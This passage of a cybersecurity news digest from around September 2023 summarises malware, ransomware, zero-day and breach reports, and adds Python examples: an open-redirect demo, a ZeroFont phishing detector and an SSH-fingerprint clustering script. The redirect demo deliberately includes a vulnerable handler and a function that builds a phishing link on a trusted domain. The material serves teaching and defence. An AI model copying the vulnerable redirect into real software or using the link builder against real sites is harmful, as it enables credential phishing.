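The following is an added example, not Indeed's code; the page does not give the real endpoint or parameter name, so `/redirect?to=`, the trusted hostnames and the phishing URL below are assumptions. It shows the vulnerable pattern beside a hardened validator, and how the attacker benefits: the link in the email lives on a trusted domain, so reputation checks pass, but its redirect parameter sends the victim to the EvilProxy page sitting in front of the real login.

```python
"""Open redirect: the vulnerable handler beside a hardened validator.

Added example; endpoint, parameter name and hostnames are assumptions.
"""
from __future__ import annotations

from urllib.parse import parse_qs, quote, urlsplit

TRUSTED_ORIGIN = "https://jobs.example.invalid"              # hypothetical job site
ALLOWED_HOSTS = {"jobs.example.invalid", "www.jobs.example.invalid"}
PHISHING_URL = "https://login-m365.example.invalid/common/oauth2"  # constructed


def redirect_vulnerable(target: str) -> str:
    """The bug: the Location header is whatever the client supplied."""
    return target


def redirect_hardened(target: str, fallback: str = "/") -> str:
    """Allow only same-site relative paths or absolute https URLs whose host
    is on the allowlist. Everything else goes to the fallback."""
    # Browsers treat "\" as "/", and whitespace or control characters are a
    # classic way to smuggle a second URL past naive checks.
    if not target or any(c in target for c in "\\\r\n\t "):
        return fallback
    parts = urlsplit(target)
    if not parts.scheme and not parts.netloc:
        # relative reference: exactly one leading slash, never "//host"
        return target if target.startswith("/") and not target.startswith("//") else fallback
    if parts.scheme != "https":
        return fallback  # http:, javascript:, data: ...
    if parts.username is not None or parts.password is not None:
        return fallback  # https://trusted.example@evil.example/ trick
    if (parts.hostname or "") not in ALLOWED_HOSTS:
        return fallback  # also catches trusted.example.evil.example
    return target


def build_phishing_link(destination: str = PHISHING_URL) -> str:
    """What the attacker mails out: a link on the trusted origin."""
    return f"{TRUSTED_ORIGIN}/redirect?to={quote(destination, safe='')}"


def resolve(link: str, handler) -> str:
    """Where the victim ends up once the redirect endpoint handles the link."""
    target = parse_qs(urlsplit(link).query).get("to", [""])[0]
    return handler(target)


if __name__ == "__main__":
    link = build_phishing_link()
    print(link)
    print("vulnerable ->", resolve(link, redirect_vulnerable))
    print("hardened   ->", resolve(link, redirect_hardened))
```

The hardened version is deliberately an allowlist, not a blocklist: every bypass shown in the test cases (scheme-relative `//host`, backslash paths, `user@host` confusion, look-alike subdomains, non-https schemes) fails closed to the fallback rather than needing its own rule. Signed or opaque redirect tokens that map to server-side destinations are a stronger design still, because then no client-supplied URL is ever used.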

New BunnyLoader Threat Emerges as a Feature-Rich Malware-As-A-Service

Security researchers discovered a new malware-as-a-service (MaaS) named 'BunnyLoader' advertised on multiple hacker forums as a fileless loader that can steal and replace the contents of the system clipboard. The malware is under rapid development, with updates adding new features and bug fixes. It can currently download and execute payloads, log keys, steal sensitive data and cryptocurrency, and execute remote commands.

Ransomware Reinfections on the Rise Due to Improper Remediation

According to a recent report from Malwarebytes, it was found that ransomware attacks don't typically originate as a fresh problem for organizations; instead, they are the grim culmination of unresolved network compromises. Threat actors gain initial access through stolen login credentials, deployed malware, or established backdoors—akin to leaving an unlocked door for future visits.

Malware-Infected Devices Sold Through Major Retailers

Human Security has exposed a significant monetization method employed by a sophisticated cyber-criminal operation. This operation involved the sale of backdoored off-brand mobile and CTV (Connected TV) Android devices through major retailers, which had originated from repackaging factories in China.

FBI Warns of Surge in 'Phantom Hacker' Scams Impacting Elderly

The FBI issued a public service announcement warning of a significant increase in 'phantom hacker' scams targeting senior citizens across the United States. ‘This Phantom Hacker scam is an evolution of more general tech support scams, layering imposter tech support, financial institution, and government personas to enhance the trust victims place in the scammers and identify the most lucrative accounts to target,’ the FBI said.

Ransomware Gangs Now Exploiting Critical TeamCity RCE Flaw

Ransomware gangs are now targeting a recently patched critical vulnerability in JetBrains' TeamCity continuous integration and deployment server. The flaw (tracked as CVE-2023-42793 and tagged with a 9.8/10 severity score) allows unauthenticated attackers to gain remote code execution (RCE) after successfully exploiting an authentication bypass weakness in low-complexity attacks that don't require user interaction.

Future Government Shutdowns: Potential Impact on National Cybersecurity

A Forbes report notes that the nation's cybersecurity narrowly avoided a tight spot when Congress passed a bill to keep the government running for another 45 days. A shutdown would have disrupted many government functions, including those responsible for defending the country against cyberattacks, and, depending on how long it lasted, could have become a crisis for companies and organizations across the country.

Microsoft Edge, Teams Get Fixes for Zero-days in Open-source Libraries

Microsoft released emergency security updates for Edge, Teams, and Skype to patch two zero-day vulnerabilities in open-source libraries used by the three products. The first bug is a flaw tracked as CVE-2023-4863 and is caused by a heap buffer overflow weakness in the WebP code library (libwebp), whose impact ranges from crashes to arbitrary code execution.

Strengths and Weaknesses of a Single-Vendor Approach: Microsoft

In a recent report by SentinelOne, it's highlighted that Microsoft's security business has seen substantial growth, generating over $20 billion annually. The International Data Corporation (IDC) reported that Microsoft holds the largest market share in 2022, at 18.9%, with a 7.2% increase. Similarly, Gartner estimated that in 2021, Microsoft controlled 8.5% of the entire security software market, outperforming its competitors.

Chinese Threat Actors Stole Around 60,000 Emails from US State Department in Microsoft Breach - Filing

This report is filed under "Vendor Reports" because Microsoft, as the vendor, investigated it as a notable incident: "Microsoft researchers discovered that the threat actors gained access to customer email accounts using Outlook Web Access in Exchange Online (OWA) and Outlook[.]com by forging authentication tokens to access user email." Microsoft corrected the issue in its products by "revoking all valid MSA signing keys to prevent attackers from accessing other compromised keys."

Zanubis Android Banking Trojan Poses as Peruvian Government App to Target Users

An emerging Android banking trojan called Zanubis is now masquerading as a Peruvian government app to trick unsuspecting users into installing the malware. ‘Zanubis's main infection path is through impersonating legitimate Peruvian Android applications and then tricking the user into enabling the Accessibility permissions in order to take full control of the device,’ Kaspersky said in an analysis published last week.

Millions of Exim Mail Servers Exposed to Zero-Day RCE Attacks

A critical zero-day vulnerability was disclosed in the Exim mail transfer agent (MTA) software, which if successfully exploited could enable an unauthenticated attacker to gain remote code execution on Internet-exposed servers. Tracked as CVE-2023-42115, the flaw resides in the SMTP service, which listens on TCP port 25 by default. According to Trend Micro’s Zero Day Initiative, which uncovered the flaw, CVE-2023-42115 results from a lack of proper validation of user-supplied data which could result in a write past the end of a buffer and further allow an attacker to execute code in the context of the service account.

Exploit Available for Critical WS_FTP Bug Exploited in Attacks

Over the weekend, security researchers uncovered a critical vulnerability (CVE-2023-40044) in Progress Software's WS_FTP Server. They released a proof-of-concept (PoC) exploit along with technical details. The flaw stems from a .NET deserialization vulnerability in the Ad Hoc Transfer Module, allowing unauthenticated attackers to execute remote commands via a simple HTTP request. Assetnote researchers, who discovered the issue, expressed surprise at how long it remained unpatched.

Exploit Released for Microsoft SharePoint Server Authentication Bypass Flaw

Proof-of-concept exploit code has surfaced on GitHub for a critical authentication bypass vulnerability in Microsoft SharePoint Server, allowing privilege escalation. Tracked as CVE-2023-29357, the security flaw can let unauthenticated attackers gain administrator privileges following successful exploitation in low-complexity attacks that don't require user interaction.

Hackers Steal User Database from European Telecommunications Standards Body

Hackers targeted the European Telecommunications Standards Institute (ETSI), a nonprofit organization responsible for developing communication standards, and stole a user database. The motive behind the attack remains unclear, with suspicions ranging from financial gain to potential espionage. ETSI engaged France's cybersecurity agency ANSSI to investigate and enhance its information systems' security.

Chinese Threat Actors Stole Around 60,000 Emails from US State Department in Microsoft Breach

China-linked hackers breached Microsoft's email platform in May and stole tens of thousands of emails from U.S. State Department accounts, according to a Senate staffer. During a briefing by State Department IT officials, it was revealed that threat actors targeted around 60,000 emails from a total of 10 State Department accounts belonging to officials working in East Asia, the Pacific, and Europe.

Budworm Hackers Target Telcos and Govt Orgs With Custom Malware

A Chinese cyber-espionage group known as Budworm has recently been detected engaging in cyberattacks. They have specifically targeted a telecommunications company in the Middle East and a government organization in Asia. What's noteworthy is that they've deployed a new version of their customized 'SysUpdate' malware.

Google Fixes Fifth Actively Exploited Chrome Zero-Day of 2023

Yesterday, Google released emergency security updates to address a zero-day flaw impacting its Chrome Browser. Tracked as CVE-2023-5217, the flaw relates to a heap buffer overflow weakness in the VP8 encoding of libvpx, an open-source video codec library from Google and the Alliance for Open Media (AOMedia). A successful exploit of this flaw could lead to browser crashes or arbitrary code execution.

Cisco Urges Admins to Fix IOS Software Zero-Day Exploited in Attacks

Multiple vulnerabilities have been identified in Cisco Catalyst SD-WAN Manager (formerly Cisco SD-WAN vManage). They could allow attackers to access an affected instance or cause a denial of service (DoS) condition on the affected system. Cisco has addressed them through software updates. Although exploiting this vulnerability demands significant access to the target environment, threat actors have already initiated attacks, as the company reported in the same advisory.

US and Japan Warn of Chinese Hackers Backdooring Cisco Routers

US and Japanese law enforcement and cybersecurity agencies warn of the Chinese 'BlackTech' hackers breaching network devices to install custom backdoors for access to corporate networks. The joint report comes from the FBI, NSA, CISA, and the Japanese NISC (cybersecurity) and NPA (police), who explain that the state-sponsored hacking group is breaching network devices at international subsidiaries to pivot to the networks of corporate headquarters.

GitHub Repos Bombarded By Info-Stealing Commits Masked as Dependabot

Hackers are breaching GitHub accounts and inserting malicious code disguised as Dependabot contributions to steal authentication secrets and passwords from developers. The campaign unfolded in July 2023, when researchers discovered unusual commits on hundreds of public and private repositories forged to appear as Dependabot commits.

New ZenRAT Malware Targeting Windows Users via Fake Password Manager Software

Researchers at Proofpoint have uncovered a new malware strain dubbed ZenRAT which is being distributed via bogus installation packages of the Bitwarden password manager. ZenRAT is a modular remote access trojan that comes with various modules designed to steal information from victims’ systems. Although researchers noted that ZenRAT is being hosted on fake websites pretending to be associated with Bitwarden, it’s unclear how end users are being directed to these sites.

New Zerofont Phishing Tricks Outlook Into Showing Fake AV-Scans

Threat actors are employing a novel tactic by incorporating zero-point fonts within emails, creating the illusion that malicious emails have undergone successful security scans in Microsoft Outlook. While the ZeroFont phishing method has been previously observed, its current application marks a significant development. ISC Sans analyst Jan Kopriva, in a recent report, cautions that this technique could greatly enhance the success rate of phishing attacks, underscoring the importance of user awareness regarding its deployment in real-world scenarios.
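
The scanner below is an added example, not code from the ISC SANS report. The trick relies on a reassuring phrase (a fake "scanned, no threats found" banner) being placed in an element styled with a zero font size: it never renders in the body, but a preview or listing pane that builds its snippet from the raw text still shows it. The scanner walks the HTML, tracks which open elements carry a zero font size (inherited by their children), and separates the text that would be invisible from the text the user actually sees. The sample emails are constructed for this example.

```python
"""ZeroFont detector for HTML email bodies.

Added example; the sample emails are constructed.
"""
from __future__ import annotations

import re
from html.parser import HTMLParser

# font-size:0, 0px, 0pt, 0.0em, "0 !important" ... but not 0.5em or 10px
ZERO_FONT_RE = re.compile(
    r"font-size\s*:\s*0+(?:\.0+)?\s*(?:px|pt|em|rem|%)?\s*(?:;|!important|$)", re.I
)
# elements that never get a closing tag; keep them off the nesting stack
VOID_TAGS = {"br", "img", "hr", "meta", "link", "input", "area", "base", "col", "wbr"}
SCAN_WORDS = re.compile(
    r"\b(scanned|secured|verified|safe|no threats?|antivirus|protection)\b", re.I
)


class ZeroFontScanner(HTMLParser):
    """Split text nodes into hidden (inside a zero-font element) and visible."""

    def __init__(self) -> None:
        super().__init__()
        self.stack: list[bool] = []   # per open element: is its text hidden?
        self.hidden: list[str] = []
        self.visible: list[str] = []
        self.ordered: list[str] = []  # every text node in document order

    def handle_starttag(self, tag: str, attrs) -> None:
        if tag in VOID_TAGS:
            return
        style = dict(attrs).get("style") or ""
        inherited = self.stack[-1] if self.stack else False
        self.stack.append(inherited or bool(ZERO_FONT_RE.search(style)))

    def handle_startendtag(self, tag, attrs) -> None:
        return  # <br/> form: nothing to push or pop

    def handle_endtag(self, tag: str) -> None:
        if tag not in VOID_TAGS and self.stack:
            self.stack.pop()

    def handle_data(self, data: str) -> None:
        text = " ".join(data.split())
        if not text:
            return
        self.ordered.append(text)
        (self.hidden if self.stack and self.stack[-1] else self.visible).append(text)


def scan_email_html(html: str) -> dict:
    """Return hidden and visible text, the snippet a font-blind preview pane
    would show, and whether the hidden text looks like a fake scan banner."""
    p = ZeroFontScanner()
    p.feed(html)
    p.close()
    hidden_blob = " ".join(p.hidden)
    return {
        "hidden": p.hidden,
        "visible": p.visible,
        "preview": " ".join(p.ordered)[:120],
        "fake_scan_banner": bool(p.hidden) and bool(SCAN_WORDS.search(hidden_blob)),
    }


# Constructed sample: the banner is invisible in the body but leads the preview.
SAMPLE_EMAIL = """<html><body>
<span style="font-size:0px;color:#ffffff">Scanned and secured by Example Advanced Threat Protection. No threats found.</span>
<p>Your mailbox is almost <b>full</b>.
<a href="https://login.example.invalid/verify">Verify your account</a> within 24 hours.</p>
<br>
<div style="FONT-SIZE: 0pt"><p>Message verified safe</p></div>
</body></html>"""

BENIGN_EMAIL = """<p style="font-size:12px">Lunch is at <b>noon</b> on Friday.</p>"""

if __name__ == "__main__":
    print(scan_email_html(SAMPLE_EMAIL))
    print(scan_email_html(BENIGN_EMAIL))
```

Any zero-font text is worth surfacing in a mail gateway, but marketers also hide "preheader" text this way, so the verdict here is only raised when the hidden text reads like a security assurance. Extending the check to other invisibility tricks (display:none, colour matching the background, 1px fonts) follows the same pattern: add the style test to ZERO_FONT_RE or a sibling regex and let the stack propagate it to child elements.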

Shadowsyndicate Hackers Linked to Multiple Ransomware Ops, 85 Servers

Security researchers have identified ShadowSyndicate as a threat actor that has used seven ransomware families in attacks over the past year. They suggest it could be an initial access broker and affiliate to ransomware operations. The findings are based on a distinct SSH fingerprint found on 85 servers, discovered using tools like Shodan and Censys. The fingerprint was first seen in July 2022 and was still in use in August 2023. Researchers also found eight different Cobalt Strike watermarks on ShadowSyndicate servers.
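
The following is an added example, not the researchers' tooling, showing how the indicator behind this attribution is derived and used: an SSH host-key fingerprint is a hash of the raw public-key blob, so any two servers presenting the same key (an operator cloning one image or reusing one key pair) yield the same fingerprint and can be clustered from known_hosts entries or a scanner's key dump. The keys and hosts below are constructed (valid wire format, throwaway key bytes, documentation IP ranges), not real operator infrastructure.

```python
"""SSH host-key fingerprints as an infrastructure-clustering indicator.

Added example; keys and hosts are constructed.
"""
from __future__ import annotations

import base64
import hashlib
import struct
from collections import defaultdict

KEY_TYPES = ("ssh-ed25519", "ssh-rsa", "ecdsa-sha2-nistp256", "sk-ssh-ed25519@openssh.com")


def ssh_string(b: bytes) -> bytes:
    """RFC 4251 'string': uint32 big-endian length prefix followed by the bytes."""
    return struct.pack(">I", len(b)) + b


def make_ed25519_blob(pub32: bytes) -> str:
    """Base64 key blob exactly as it appears in known_hosts / authorized_keys."""
    blob = ssh_string(b"ssh-ed25519") + ssh_string(pub32)
    return base64.b64encode(blob).decode()


def fingerprint(line: str, algo: str = "sha256") -> str:
    """OpenSSH fingerprint of a key line. Accepts 'host type blob [comment]'
    (known_hosts, ssh-keyscan) or 'type blob [comment]' (authorized_keys).
    SHA256 is rendered as unpadded base64 like `ssh-keygen -lf`; MD5 as the
    colon-separated hex that many scanners still report."""
    fields = line.split()
    for i, f in enumerate(fields):
        if f in KEY_TYPES and i + 1 < len(fields):
            raw = base64.b64decode(fields[i + 1])
            break
    else:
        raise ValueError("no public key found in line")
    if algo == "sha256":
        return "SHA256:" + base64.b64encode(hashlib.sha256(raw).digest()).decode().rstrip("=")
    if algo == "md5":
        return "MD5:" + ":".join(f"{b:02x}" for b in hashlib.md5(raw).digest())
    raise ValueError(f"unsupported algorithm {algo}")


def cluster_hosts(lines: list[str]) -> dict[str, list[str]]:
    """Group hosts that present the same host key. Distinct servers sharing
    one key usually mean one operator behind them, which is the pivot the
    researchers used."""
    groups: dict[str, list[str]] = defaultdict(list)
    for line in lines:
        host = line.split()[0]
        groups[fingerprint(line)].append(host)
    return dict(groups)


# Constructed scan results: three hosts share key A, one presents key B.
KEY_A = make_ed25519_blob(bytes(range(32)))
KEY_B = make_ed25519_blob(bytes(range(32, 64)))
SCAN_RESULTS = [
    f"203.0.113.10 ssh-ed25519 {KEY_A}",
    f"203.0.113.11 ssh-ed25519 {KEY_A}",
    f"198.51.100.7 ssh-ed25519 {KEY_B}",
    f"192.0.2.44 ssh-ed25519 {KEY_A} comment-from-keyscan",
]

if __name__ == "__main__":
    for fp, hosts in cluster_hosts(SCAN_RESULTS).items():
        print(fp, "->", hosts)
```

Because the fingerprint hashes the key blob and nothing else, the same value comes out whether the key was read from a known_hosts line, an authorized_keys line, or a scanner export, which is what makes it a portable pivot across data sources. The caveat when using it for attribution is the one the researchers themselves flag: shared keys can also come from cloud images or hosting providers that ship a baked-in host key, so a cluster is a lead to corroborate, not proof of a single operator.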

BORN Ontario child registry data breach affects 3.4 million people

The Better Outcomes Registry & Network (BORN), a healthcare organization funded by the government of Ontario, has announced that it is among the victims of Clop ransomware's MOVEit hacking spree. BORN is a perinatal and child registry that collects, interprets, shares and protects critical data about pregnancy, birth and childhood in the province of Ontario.

Ukrainian Military Targeted in Phishing Campaign Leveraging Drone Manuals

Ukrainian military entities are the target of a phishing campaign that leverages drone manuals as lures to deliver a Go-based open-source post-exploitation toolkit called Merlin. "Since drones or Unmanned Aerial Vehicles (UAVs) have been an integral tool used by the Ukrainian military, malware-laced lure files themed as UAVs service manuals have begun to surface," Securonix researchers Den Iuzvyk, Tim Peck, and Oleg Kolesnikov said in a report shared with The Hacker News.

New Stealthy and Modular Deadglyph Malware Used in Govt Attacks

A highly advanced backdoor malware called 'Deadglyph' was recently employed in a cyber espionage operation targeting a Middle Eastern government agency. This sophisticated malware, known as Deadglyph, has been linked to the Stealth Falcon Advanced Persistent Threat (APT) group, also known as Project Raven or FruityArmor.

Is Gelsemium APT Behind a Targeted Attack in Southeast Asian Government?

Researchers at Kaspersky Lab have uncovered a new backdoor called "SessionManager" that has been used in attacks targeting Microsoft IIS Servers since March 2021. This backdoor allows threat actors to maintain persistent, update-resistant, and stealthy access to a targeted organization's IT infrastructure. It has been deployed in over 20 organizations, and as of late April 2022, many samples were not yet flagged as malicious by online file scanning services.

Dallas says Royal Ransomware Breached its Network Using Stolen Account

The City of Dallas, Texas, said this week that the Royal ransomware attack that forced it to shut down all IT systems in May started with a stolen account. Royal gained access to the City's network using a stolen domain service account in early April and maintained access to the compromised systems between April 7 and May 4. During this period, they successfully collected and exfiltrated 1.169 TB worth of files based on system log data analysis conducted by city officials and external cybersecurity experts.

Chinese Malware Appears in Earnest Across Cybercrime Threat Landscape

Proofpoint has observed an increase in activity from specific malware families targeting Chinese-language speakers. Campaigns include Chinese-language lures and malware typically associated with Chinese cybercrime activity. Newly observed ValleyRAT is emerging as a new malware among Chinese-themed cybercrime activity, while Sainbox RAT and related variants are recently active as well.

Pro-Russia Hacker Group NoName Launched a DDoS Attack on Canadian Airports Causing Severe Disruption

Pro-Russia hacker group NoName is suspected of launching a DDoS cyberattack that caused significant disruptions at several Canadian airports. The attack affected check-in kiosks and electronic gates, leading to delays in the processing of arrivals at border checkpoints across the country. The Canada Border Services Agency (CBSA) confirmed the DDoS attack and is investigating the incident, assuring that no personal information has been compromised. No evidence of a data breach has been found at this time.

P2PInfect Botnet Activity Surges 600x with Stealthier Malware Variants

The P2PInfect botnet worm has entered a phase of significantly increased activity, with a notable surge observed from late August through September 2023. Initially documented by Unit 42 in July 2023, P2PInfect is categorized as a peer-to-peer malware that exploits a remote code execution vulnerability to breach Redis instances on internet-exposed Windows and Linux systems.

Cyber Group 'Gold Melody' Selling Compromised Access to Ransomware Attackers

A financially motivated threat actor has been outed as an initial access broker (IAB) that sells access to compromised organizations for other adversaries to conduct follow-on attacks such as ransomware. SecureWorks Counter Threat Unit (CTU) has dubbed the e-crime group Gold Melody, which is also known by the names Prophet Spider (CrowdStrike) and UNC961 (Mandiant).

T-Mobile App Glitch Let Users See Other People's Account Info

Today, T-Mobile customers said they could see other people's account and billing information after logging into the company's official mobile application. According to user reports on social media, the exposed information included customers' names, phone numbers, addresses, account balances, and credit card details like the expiration dates and the last four digits.

GitLab Releases Urgent Security Patches for Critical Vulnerability

GitLab recently rolled out security updates to address a critical vulnerability impacting its enterprise edition. Tracked as CVE-2023-5009, the flaw could enable an attacker to run pipelines as an arbitrary user via scheduled security scan policies. As such, the actor could use elevated permissions of the impersonated user to further access sensitive information, modify source code, or even run arbitrary code on the targeted system.

Finnish Authorities Dismantle Notorious PIILOPUOTI Dark Web Drug Marketplace

Finnish law enforcement authorities have announced the takedown of PIILOPUOTI, a dark web marketplace that specialized in illegal narcotics trade since May 2022. ‘The site operated as a hidden service in the encrypted TOR network,’ the Finnish Customs (aka Tulli) said in a brief announcement on Tuesday. ‘The site has been used in anonymous criminal activities such as narcotics trade.’

Fake WinRAR Proof-of-Concept Exploit Drops VenomRAT Malware

Threat actors exploited a recently disclosed WinRAR vulnerability (CVE-2023-40477) by repurposing an older proof-of-concept (PoC) code. The Zero Day Initiative initially reported the WinRAR vulnerability to the vendor on June 8, 2023, but publicly disclosed it on August 17, 2023. Within four days of the public disclosure, an actor known as "whalersplonk" uploaded a fake PoC script to their GitHub repository.

Snatch Ransomware Alert

Snatch is a ransomware group primarily targeting Windows-based systems. They employ various tactics, including exploiting vulnerabilities, brute force attacks, and data exfiltration to compromise and extort victims. Snatch operates under a ransomware-as-a-service (RaaS) model and has targeted critical infrastructure sectors such as Defense Industrial Base (DIB), Food and Agriculture, and Information Technology.

ShroudedSnooper Threat Actors Target Telecom Companies in the Middle East

Telecommunications companies have increasingly become the focus of state-sponsored actors and advanced adversaries in recent years. In 2022, the telecommunications sector consistently ranked as one of the most targeted verticals in Talos IR (Incident Response) engagements. Telecom companies control critical infrastructure assets, which make them attractive targets for adversaries seeking to create significant disruptions.

Trend Micro Fixes Endpoint Protection Zero-day Used in Attacks

Trend Micro fixed a remote code execution zero-day vulnerability in Trend Micro's Apex One endpoint protection solution that was actively exploited in attacks. Apex One is an endpoint security solution catering to businesses of all sizes, and the 'Worry-Free Business Security' suite is designed for small to medium-sized companies.

Earth Lusca Expands Arsenal with SprySocks Linux Malware

China-linked threat group Earth Lusca has deployed a new Linux malware called SprySOCKS in a recent cyber espionage campaign. Researchers at Trend Micro discovered this malware while tracking Earth Lusca's activities. SprySOCKS, based on an open-source Windows backdoor called Trochilus, was adapted for Linux. Earth Lusca continues to develop it, as evidenced by different versions detected.

Bumblebee Malware Returns in New Attacks Abusing WebDAV Folders

The malware loader 'Bumblebee' has broken its two-month vacation with a new campaign that employs new distribution techniques that abuse 4shared WebDAV services. WebDAV (Web Distributed Authoring and Versioning) is an extension of the HTTP protocol that enables clients to perform remote authoring operations such as creating, accessing, updating, and deleting web server content.

Microsoft AI Researchers Accidentally Expose 38 Terabytes of Confidential Data

Microsoft on Monday said it took steps to correct a glaring security gaffe that led to the exposure of 38 terabytes of private data. The leak was discovered on the company's AI GitHub repository and is said to have been inadvertently made public when publishing a bucket of open-source training data, Wiz said. It also included a disk backup of two former employees' workstations containing secrets, keys, passwords, and over 30,000 internal Teams messages.

New AMBERSQUID Cryptojacking Operation Targets Uncommon AWS Services

A new cloud-native cryptojacking operation, known as AMBERSQUID, is targeting less common AWS services like AWS Amplify, AWS Fargate, and Amazon SageMaker for illicit cryptocurrency mining. Sysdig, a security firm, identified this campaign while analyzing 1.7 million Docker Hub images and attributed it to Indonesian attackers due to their use of the Indonesian language in scripts and usernames.

FBI Hacker USDOD Leaks Highly Sensitive TransUnion Data

Researchers at vx-underground have uncovered a major data breach involving the hacker known as "USDoD," who leaked highly sensitive data from TransUnion, a leading consumer credit reporting agency. The breach exposed personal information of 58,505 individuals globally, including names, passport details, financial data, and more, dating back to March 2022.

Canadian Government Targeted With DDoS Attacks by Pro-Russia Group

The pro-Russian cybercrime group named NoName057(16) has been observed launching distributed denial-of-service (DDoS) attacks against Canadian organizations, a fresh government alert warns. Since March 2022, the threat actor – also known as NoName05716, 05716nnm or Nnm05716 – has been launching disruptive attacks in support of Russia’s invasion of Ukraine.

BlackCat Ransomware Hits Azure Storage with Sphynx Encryptor

The BlackCat (ALPHV) ransomware gang now uses stolen Microsoft accounts and the recently spotted Sphynx encryptor to encrypt targets' Azure cloud storage. While investigating a recent breach, Sophos X-Ops incident responders discovered that the attackers used a new Sphynx variant with added support for using custom credentials. After gaining access to the Sophos Central account using a stolen One-Time Password (OTP), they disabled Tamper Protection and modified the security policies.

Iranian Hackers Breach Defense Orgs in Password Spray Attacks

Since February 2023, Microsoft has reported that an Iranian-backed threat group known as APT33 (or Peach Sandstorm, HOLMIUM, Refined Kitten) has been conducting password spray attacks against thousands of organizations in the U.S. and globally. These attacks involve attempting to access multiple accounts using a single or commonly used password, increasing the chances of success without triggering account lockouts.

ORBCOMM Ransomware Attack Causes Trucking Fleet Management Outage

Trucking and fleet management solutions provider ORBCOMM has confirmed that a ransomware attack is behind recent service outages preventing trucking companies from managing their fleets. ORBCOMM is a solutions provider for freight companies to manage fleets and track transported assets. The company also provides Electronic Logging Devices (ELD) that truckers use to log their hours to adhere to federal safety regulations.

NodeStealer Malware Now Targets Facebook Business Accounts on Multiple Browsers

An ongoing campaign is targeting Facebook Business accounts with bogus messages to harvest victims' credentials using a variant of the Python-based NodeStealer and potentially take over their accounts for follow-on malicious activities. ‘The attacks are reaching victims mainly in Southern Europe and North America across different segments, led by the manufacturing services and technology sectors.’

Pirated Software Likely Cause of Airbus Breach

A major data breach at Airbus revealed earlier this week stemmed from a RedLine info-stealer likely hidden in a pirated copy of Microsoft software, according to researchers. The European aerospace giant said it has launched an investigation into the incident.

Enterprises Persist with Outdated Authentication Strategies

Despite authentication being a cornerstone of cybersecurity, risk mitigation strategies remain outdated, according to new research from Enzoic. With the attack surface expanding and the increasing sophistication of cyber threats, organizations are struggling to deliver secure and user-friendly authentication. The research uncovered that despite the emergence of modern strategies, most companies still rely on traditional approaches.

Scattered Spider Behind MGM Cyberattack, Targets Casinos

The "Scattered Spider" threat group is believed to be responsible for the cyberattack on MGM Resorts that occurred on September 10. This attack has left systems offline in over 30 hotels and casinos owned by the conglomerate worldwide, and the disruption continues even days later. As reported by Reuters, the Scattered Spider ransomware group, as identified by sources familiar with the situation, is believed to consist of young individuals based in the US and UK.

Russian Journalist's iPhone Compromised by NSO Group's Zero-Click Spyware

The iPhone belonging to Galina Timchenko, a prominent Russian journalist and critic of the government, was compromised with NSO Group's Pegasus spyware, a new collaborative investigation from Access Now and the Citizen Lab has revealed. The infiltration is said to have happened on or around February 10, 2023. Timchenko is the executive editor and owner of Meduza, an independent news publication based in Latvia.

Update Adobe Acrobat and Reader to Patch Actively Exploited Vulnerability

Adobe recently addressed a critical flaw in Acrobat and Reader that could enable actors to execute malicious code on targeted systems. Tracked as CVE-2023-26369, the vulnerability has been rated 7.8 out of 10 on the CVSS scale, indicating a high level of severity. According to the vendor, CVE-2023-26369 relates to an out-of-bounds write issue and can be exploited to execute arbitrary code via specially crafted PDF documents.

Suspected Ransomware Attack Hits Auckland Transport's Hop Cards

Auckland Transport's Hop card system has been hit by a suspected ransomware attack, leading to disruptions in card top-up services and limited functionality at customer service centers. The attack is under investigation, and there is no indication that personal or financial data has been compromised. Commuters can still use their cards to tag on and off, but online top-ups and services on the AT website are unavailable.

Kubernetes Flaws Could Lead to Remote Code Execution on Windows Endpoints

Akamai researchers recently discovered a high-severity vulnerability in Kubernetes tracked as CVE-2023-3676 (CVSS 8.8). The identification of this issue led to the discovery of two more vulnerabilities, tracked as CVE-2023-3893 and CVE-2023-3955 (CVSS 8.8). All three vulnerabilities were caused by an insecure function call and a lack of user input sanitization.

MetaStealer Malware is Targeting Enterprise macOS Users

A new strain of macOS malware is targeting enterprise users, as indicated by file names and content. Some versions of this malware, called MetaStealer, masquerade as Adobe files, while others use deceptive methods like password-protected ZIP files sent by fake clients. Once opened, these files reveal an app disguised as a PDF.

Ransomware Access Broker Steals Accounts via Microsoft Teams Phishing

Microsoft has reported a change in tactics by an initial access broker, previously associated with ransomware groups. This actor, identified as Storm-0324, has shifted its focus to Microsoft Teams phishing attacks as a means to infiltrate corporate networks. Storm-0324 is a financially motivated threat group with a history of deploying ransomware such as Sage and GandCrab in previous campaigns.

Rust-Written 3AM Ransomware: A Sneak Peek into a New Malware Family

A new ransomware family called 3AM has emerged in the wild after it was detected in a single incident in which an unidentified affiliate deployed the strain following an unsuccessful attempt to deliver LockBit (attributed to Bitwise Spider or Syrphid) in the target network. 3AM gets its name from the fact that it's referenced in the ransom note. It also appends encrypted files with the extension .threeamtime.

Microsoft September 2023 Patch Tuesday Fixes 2 Zero-Days, 59 Flaws

As part of the September Patch Tuesday, Microsoft addressed 59 flaws, including two zero-days that were exploited in attacks in the wild. In total, Microsoft released fixes for 3 Security Feature Bypass Vulnerabilities, 24 Remote Code Execution Vulnerabilities, 9 Information Disclosure Vulnerabilities, 3 Denial of Service Vulnerabilities, 5 Spoofing Vulnerabilities, and 5 Edge - Chromium Vulnerabilities.

Facebook Messenger Phishing Wave Targets 100K Business Accounts Per Week

Hackers use a massive network of fake and compromised Facebook accounts to send out millions of Messenger phishing messages to target Facebook business accounts with password-stealing malware. The attackers trick the targets into downloading a RAR/ZIP archive containing a downloader for an evasive Python-based stealer that grabs cookies and passwords stored in the victim's browser.

Google Fixes Another Chrome Zero-Day Bug Exploited in Attacks

Yesterday, Google released security updates to fix a critical zero-day vulnerability in its Chrome web browser. Tracked as CVE-2023-4863, the flaw relates to a heap-based buffer overflow in the WebP image format. Successful exploitation of this issue could result in browser crashes or arbitrary code execution.

Cuba Ransomware Group Unleashes Undetectable Malware

Security researchers at Kaspersky have exposed the activities of the infamous ransomware group Cuba. In a recent advisory, Kaspersky revealed that this cyber-criminal gang has been targeting organizations across different industries worldwide. In December 2022, Kaspersky detected a suspicious incident on a client's system, which led to the discovery of three mysterious files triggering the komar65 library, also known as BUGHATCH.

Apple Backports BLASTPASS Zero-Day Fix to Older iPhones

Apple released security updates for older iPhones to fix a zero-day vulnerability tracked as CVE-2023-41064 that was actively exploited to infect iOS devices with NSO's Pegasus spyware. CVE-2023-41064 is a remote code execution flaw that is exploited by sending maliciously crafted images via iMessage.

'Redfly' Hackers Infiltrated Power Supplier's Network for 6 Months

